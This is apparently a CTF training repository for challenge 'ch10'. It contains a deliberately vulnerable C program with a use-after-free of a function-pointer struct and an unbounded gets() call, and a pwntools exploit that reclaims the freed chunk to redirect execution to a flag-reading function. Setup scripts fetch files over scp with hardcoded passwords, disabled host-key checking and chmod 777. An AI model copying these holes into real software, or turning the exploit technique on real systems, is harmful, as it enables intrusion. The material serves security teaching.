//__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | important* work; 20 | 21 | void func(){ 22 | printf("[*] Working\n"); 23 | } 24 | 25 | void secret(){ 26 | system("cat flag"); 27 | } 28 | 29 | void create_worker(){ 30 | work = (important*) malloc(sizeof(important)); 31 | work->func_ptr = func; 32 | printf("Worker Created in %p\n", work); 33 | } 34 | 35 | void start_worker(){ 36 | work->func_ptr(); 37 | } 38 | 39 | void free_worker(){ 40 | free(work); 41 | } 42 | 43 | void send(){ 44 | message* msg = (message*) malloc(sizeof(message)); 45 | printf("Message Created in %p\n", msg); 46 | 47 | printf("Creating message\n"); 48 | printf("Enter message name:"); 49 | fgets(msg->name, BUF_SIZE, stdin); 50 | printf("Enter message content:"); 51 | gets(msg->content); 52 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 53 | } 54 | 55 | int menu(){ 56 | char buffer[BUF_SIZE] = {0}; 57 | 58 | printf("[*] menu\n"); 59 | printf("menu - show this menu\n"); 60 | printf("send - send new message\n"); 61 | printf("create_worker - create worker\n"); 62 | printf("start_worker - run worker\n"); 63 | printf("free_worker - free current worker\n"); 64 | printf("exit - close program\n"); 65 | 66 | fgets(buffer, BUF_SIZE, stdin); 67 | 68 | if (strcmp(buffer, "menu\n") == 0){ 69 | return 1; 70 | } 71 | else if (strcmp(buffer, "create_worker\n") == 0){ 72 | create_worker(); 73 | return 1; 74 | } 75 | else if (strcmp(buffer, "start_worker\n") == 0){ 76 | start_worker(); 77 | return 1; 78 | } 79 | else if (strcmp(buffer, "free_worker\n") == 0){ 80 | free_worker(); 81 | return 1; 82 | } 83 | else if (strcmp(buffer, "send\n") == 0){ 84 | send(); 85 | return 1; 86 | } 87 | else if (strcmp(buffer, "exit\n") == 0){ 88 | return 0; 89 | } 90 | else{ 91 | printf("Unknown command: %s", buffer); 92 | return 1; 93 | } 94 | 95 | } 96 | 97 | int main(int argc, char **argv){ 98 | setbuf(stdout, NULL); 99 | uid_t uid = geteuid(); 100 | setresuid(uid,uid,uid); 101 | printf("Welcome to ch10!\n"); 102 | while(1){ 103 | if (!(menu())){ 104 | break; 105 | } 106 | printf("\n"); 107 | } 108 | printf("Exiting...\n"); 109 | } 110 | -------------------------------------------------------------------------------- /writeups/i386/ch10/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch10.c -static -no-pie -o $1/ch10 2 | -------------------------------------------------------------------------------- /writeups/i386/ch10/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def free_worker(r): 9 | r.sendline('free_worker') 10 | 11 | 12 | def start_worker(r): 13 | r.sendline('start_worker') 14 | 15 | 16 | def create_worker(r): 17 | r.sendline('create_worker') 18 | 19 | 20 | def send(r, msg_name, msg_content): 21 | r.sendline('send') 22 | r.recvuntil('Enter message name:') 23 | r.sendline(msg_name) 24 | r.recvuntil('Enter message content:') 25 | r.sendline(msg_content) 26 | 27 | 28 | def main(execution): 29 | challenge_name = 'ch10' 30 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 31 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 32 | 33 | secret_func_addr = ELF(challenge_name).functions['secret'].address 34 | r.recvuntil('exit - close program') 35 | 36 | create_worker(r) 37 | free_worker(r) 38 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32)) 39 | start_worker(r) 40 | 41 | r.recvuntil('zenysec') 42 | flag = 'zenysec' + r.recvuntil('\n') 43 | log.success('The flag is: {flag}'.format(flag=flag)) 44 | r.close() 45 | 46 | 47 | if __name__ == '__main__': 48 | parser = argparse.ArgumentParser(description='Exploit ch10') 49 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 50 | main(**vars(parser.parse_args())) 51 | -------------------------------------------------------------------------------- /writeups/i386/ch10/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/gdb_plugin.sh: -------------------------------------------------------------------------------- 1 | define xhelp 2 | printf "---------------\n" 3 | printf "---------------\n" 4 | end 5 | -------------------------------------------------------------------------------- /writeups/i386/remote.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | function welcome(){ 4 | echo "** ZenySec Exercises **" 5 | 6 | if [ -z "$1" ]; then 7 | echo "usage: ./remote.sh project_path (writeups/i386)" 8 | exit 1 9 | fi 10 | 11 | export PYTHONPATH=$1:$PYTHONPATH 12 | } 13 | 14 | function remote(){ 15 | echo "[*] Testing exploits remote..." 16 | for i in `ls | grep ch`; do 17 | cd $1/$i 18 | python exploit.py -e remote 19 | cd .. 20 | done 21 | } 22 | 23 | function main(){ 24 | welcome $1 25 | remote $1 26 | } 27 | 28 | main $1 29 | echo "[*] Done!" 30 | -------------------------------------------------------------------------------- /writeups/i386/setup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | function welcome(){ 4 | echo "** ZenySec Exercises **" 5 | 6 | if [[ $EUID -ne 0 ]]; then 7 | echo "This script must be run as root" 8 | exit 1 9 | fi 10 | 11 | if [ -z "$1" ]; then 12 | echo "usage: ./setup.sh user_name" 13 | exit 1 14 | fi 15 | } 16 | 17 | function download_tools(){ 18 | echo "[*] Downloading tools..." 19 | sshpass -p 'welcome' scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no welcome@exercises-i386.zenysec.com:/home/welcome/\{debug.sh,gdb_plugin.sh,run.sh,remote.sh\} . 20 | } 21 | 22 | function download_challenges(){ 23 | echo "[*] Downloading challenges..." 24 | 25 | for i in ch00 ch01 ch02 ch03 ch04 ch05 ch06 ch07 ch08 ch09 ch10; do 26 | mkdir -p $i 27 | sshpass -p $i scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $i@exercises-i386.zenysec.com:/home/$i/\{$i.c,$i,compile.sh\} $i/ 28 | done 29 | } 30 | 31 | function download(){ 32 | apt-get update 33 | 34 | download_tools 35 | download_challenges 36 | 37 | 38 | } 39 | 40 | function change_permissions(){ 41 | chgrp -R $1 ch*/ 42 | chown -R $1 ch*/ 43 | chmod 777 ch*/* 44 | 45 | chgrp -R $1 *.sh 46 | chown -R $1 *.sh 47 | chmod +x *.sh 48 | } 49 | 50 | function main(){ 51 | welcome $1 52 | download $1 53 | change_permissions $1 54 | } 55 | 56 | main $1 57 | echo "[*] Done!" 58 | --------------------------------------------------------------------------------